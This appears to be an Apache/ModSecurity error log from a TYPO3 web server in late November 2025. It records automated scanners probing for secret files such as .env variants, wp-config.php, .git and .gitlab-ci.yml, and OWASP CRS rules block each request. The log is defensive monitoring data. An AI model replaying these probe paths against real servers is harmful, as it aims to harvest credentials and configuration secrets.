[Thu Nov 27 04:12:01.329765 2025] [:error] [pid 354741] [client 54.236.248.190:57870] [client 54.236.248.190] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /tools/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/tools/.env"] [unique_id "aSfBgc6T76P9_m8d0ivoUQAAAAg"]
[Thu Nov 27 04:12:01.330105 2025] [:error] [pid 354741] [client 54.236.248.190:57870] [client 54.236.248.190] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/tools/.env"] [unique_id "aSfBgc6T76P9_m8d0ivoUQAAAAg"]
[Thu Nov 27 04:12:01.330413 2025] [:error] [pid 354741] [client 54.236.248.190:57870] [client 54.236.248.190] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/tools/.env"] [unique_id "aSfBgc6T76P9_m8d0ivoUQAAAAg"]
[Thu Nov 27 04:12:01.768321 2025] [:error] [pid 353185] [client 54.236.248.190:58030] [client 54.236.248.190] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /v1/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/v1/.env"] [unique_id "aSfBgXTG8IrOxOxezX5ASAAAAAE"]
[Thu Nov 27 04:12:01.768556 2025] [:error] [pid 353185] [client 54.236.248.190:58030] [client 54.236.248.190] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/v1/.env"] [unique_id "aSfBgXTG8IrOxOxezX5ASAAAAAE"]
[Thu Nov 27 04:12:01.768749 2025] [:error] [pid 353185] [client 54.236.248.190:58030] [client 54.236.248.190] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/v1/.env"] [unique_id "aSfBgXTG8IrOxOxezX5ASAAAAAE"]
[Thu Nov 27 04:12:02.181330 2025] [:error] [pid 354739] [client 54.236.248.190:58158] [client 54.236.248.190] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /v2/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/v2/.env"] [unique_id "aSfBgu_UStX-GTeIAe_ukgAAAAY"]
[Thu Nov 27 04:12:02.181545 2025] [:error] [pid 354739] [client 54.236.248.190:58158] [client 54.236.248.190] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/v2/.env"] [unique_id "aSfBgu_UStX-GTeIAe_ukgAAAAY"]
[Thu Nov 27 04:12:02.181726 2025] [:error] [pid 354739] [client 54.236.248.190:58158] [client 54.236.248.190] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/v2/.env"] [unique_id "aSfBgu_UStX-GTeIAe_ukgAAAAY"]
[Thu Nov 27 04:12:02.619942 2025] [:error] [pid 354737] [client 54.236.248.190:58312] [client 54.236.248.190] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /administrator/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/administrator/.env"] [unique_id "aSfBgneYAxY_xo8wsP-UZwAAAAU"]
[Thu Nov 27 04:12:02.620177 2025] [:error] [pid 354737] [client 54.236.248.190:58312] [client 54.236.248.190] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/administrator/.env"] [unique_id "aSfBgneYAxY_xo8wsP-UZwAAAAU"]
[Thu Nov 27 04:12:02.620360 2025] [:error] [pid 354737] [client 54.236.248.190:58312] [client 54.236.248.190] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/administrator/.env"] [unique_id "aSfBgneYAxY_xo8wsP-UZwAAAAU"]
[Thu Nov 27 04:12:03.052324 2025] [:error] [pid 353187] [client 54.236.248.190:58436] [client 54.236.248.190] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /laravel/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/laravel/.env"] [unique_id "aSfBg3jjVMPW7zDRgsawAgAAAAM"]
[Thu Nov 27 04:12:03.052552 2025] [:error] [pid 353187] [client 54.236.248.190:58436] [client 54.236.248.190] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/laravel/.env"] [unique_id "aSfBg3jjVMPW7zDRgsawAgAAAAM"]
[Thu Nov 27 04:12:03.052726 2025] [:error] [pid 353187] [client 54.236.248.190:58436] [client 54.236.248.190] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/laravel/.env"] [unique_id "aSfBg3jjVMPW7zDRgsawAgAAAAM"]
[Thu Nov 27 12:49:19.110436 2025] [:error] [pid 353185] [client 195.178.110.201:35508] [client 195.178.110.201] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "aSg6v3TG8IrOxOxezX5AfwAAAAE"]
[Thu Nov 27 12:49:19.110655 2025] [:error] [pid 353185] [client 195.178.110.201:35508] [client 195.178.110.201] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "aSg6v3TG8IrOxOxezX5AfwAAAAE"]
[Thu Nov 27 12:49:19.110856 2025] [:error] [pid 353185] [client 195.178.110.201:35508] [client 195.178.110.201] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "aSg6v3TG8IrOxOxezX5AfwAAAAE"]
[Thu Nov 27 12:49:19.355270 2025] [authz_core:error] [pid 354741] [client 195.178.110.201:35524] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.git
[Thu Nov 27 12:49:19.423832 2025] [:error] [pid 360200] [client 195.178.110.201:35542] [client 195.178.110.201] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /backend/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/backend/.env"] [unique_id "aSg6vwQeQhonID1lme2y7gAAAAk"]
[Thu Nov 27 12:49:19.424037 2025] [:error] [pid 360200] [client 195.178.110.201:35542] [client 195.178.110.201] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/backend/.env"] [unique_id "aSg6vwQeQhonID1lme2y7gAAAAk"]
[Thu Nov 27 12:49:19.424207 2025] [:error] [pid 360200] [client 195.178.110.201:35542] [client 195.178.110.201] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/backend/.env"] [unique_id "aSg6vwQeQhonID1lme2y7gAAAAk"]
[Thu Nov 27 12:49:19.480589 2025] [:error] [pid 362070] [client 195.178.110.201:35536] [client 195.178.110.201] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /admin/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/admin/.env"] [unique_id "aSg6v37GWRIORDaPTtG7CwAAAAs"]
[Thu Nov 27 12:49:19.480806 2025] [:error] [pid 362070] [client 195.178.110.201:35536] [client 195.178.110.201] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/admin/.env"] [unique_id "aSg6v37GWRIORDaPTtG7CwAAAAs"]
[Thu Nov 27 12:49:19.481024 2025] [:error] [pid 362070] [client 195.178.110.201:35536] [client 195.178.110.201] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/admin/.env"] [unique_id "aSg6v37GWRIORDaPTtG7CwAAAAs"]
[Thu Nov 27 12:49:19.502640 2025] [:error] [pid 354739] [client 195.178.110.201:35540] [client 195.178.110.201] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /core/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/core/.env"] [unique_id "aSg6v-_UStX-GTeIAe_uzgAAAAY"]
[Thu Nov 27 12:49:19.502846 2025] [:error] [pid 354739] [client 195.178.110.201:35540] [client 195.178.110.201] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/core/.env"] [unique_id "aSg6v-_UStX-GTeIAe_uzgAAAAY"]
[Thu Nov 27 12:49:19.503014 2025] [:error] [pid 354739] [client 195.178.110.201:35540] [client 195.178.110.201] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/core/.env"] [unique_id "aSg6v-_UStX-GTeIAe_uzgAAAAY"]
[Thu Nov 27 12:49:19.543755 2025] [authz_core:error] [pid 362071] [client 195.178.110.201:35550] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.env.bak
[Thu Nov 27 12:49:24.694237 2025] [authz_core:error] [pid 362069] [client 195.178.110.201:46738] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.git
[Thu Nov 27 12:49:24.720970 2025] [:error] [pid 353186] [client 195.178.110.201:46734] [client 195.178.110.201] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: wp-config.php found within REQUEST_FILENAME: /wp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/wp-config.php"] [unique_id "aSg6xCOJA5NFmjDGU5hIIwAAAAI"]
[Thu Nov 27 12:49:24.721239 2025] [:error] [pid 353186] [client 195.178.110.201:46734] [client 195.178.110.201] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/wp-config.php"] [unique_id "aSg6xCOJA5NFmjDGU5hIIwAAAAI"]
[Thu Nov 27 12:49:24.721407 2025] [:error] [pid 353186] [client 195.178.110.201:46734] [client 195.178.110.201] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/wp-config.php"] [unique_id "aSg6xCOJA5NFmjDGU5hIIwAAAAI"]
[Thu Nov 27 12:49:24.882697 2025] [authz_core:error] [pid 353187] [client 195.178.110.201:46750] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.gitlab-ci.yml
[Fri Nov 28 00:31:39.228918 2025] [authz_core:error] [pid 372780] [client 45.144.212.58:33408] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.git
[Fri Nov 28 03:21:29.584811 2025] [authz_core:error] [pid 376351] [client 3.123.22.145:49526] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.git
[Fri Nov 28 03:21:29.586924 2025] [:error] [pid 376323] [client 3.123.22.145:49626] [client 3.123.22.145] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "aSkHKTFBYlzdhABrtYkPsQAAAAI"]
[Fri Nov 28 03:21:29.587175 2025] [:error] [pid 376323] [client 3.123.22.145:49626] [client 3.123.22.145] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "aSkHKTFBYlzdhABrtYkPsQAAAAI"]
[Fri Nov 28 03:21:29.587347 2025] [:error] [pid 376323] [client 3.123.22.145:49626] [client 3.123.22.145] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "aSkHKTFBYlzdhABrtYkPsQAAAAI"]
[Fri Nov 28 03:21:29.587554 2025] [:error] [pid 376321] [client 3.123.22.145:49624] [client 3.123.22.145] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.production"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.production"] [unique_id "aSkHKQ-9erAMS4LBdXdtPwAAAAA"]
[Fri Nov 28 03:21:29.587757 2025] [:error] [pid 376321] [client 3.123.22.145:49624] [client 3.123.22.145] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.production"] [unique_id "aSkHKQ-9erAMS4LBdXdtPwAAAAA"]
[Fri Nov 28 03:21:29.587956 2025] [:error] [pid 376321] [client 3.123.22.145:49624] [client 3.123.22.145] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.production"] [unique_id "aSkHKQ-9erAMS4LBdXdtPwAAAAA"]
[Fri Nov 28 03:21:29.971895 2025] [:error] [pid 376325] [client 3.123.22.145:49748] [client 3.123.22.145] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /lab/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/lab/.env"] [unique_id "aSkHKY6_oD2P8Ob2jfQpuwAAAAQ"]
[Fri Nov 28 03:21:29.972066 2025] [:error] [pid 376322] [client 3.123.22.145:49750] [client 3.123.22.145] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /cronlab/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/cronlab/.env"] [unique_id "aSkHKaJmhnjvcqmd-gK-zQAAAAE"]
[Fri Nov 28 03:21:29.972110 2025] [:error] [pid 376325] [client 3.123.22.145:49748] [client 3.123.22.145] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/lab/.env"] [unique_id "aSkHKY6_oD2P8Ob2jfQpuwAAAAQ"]
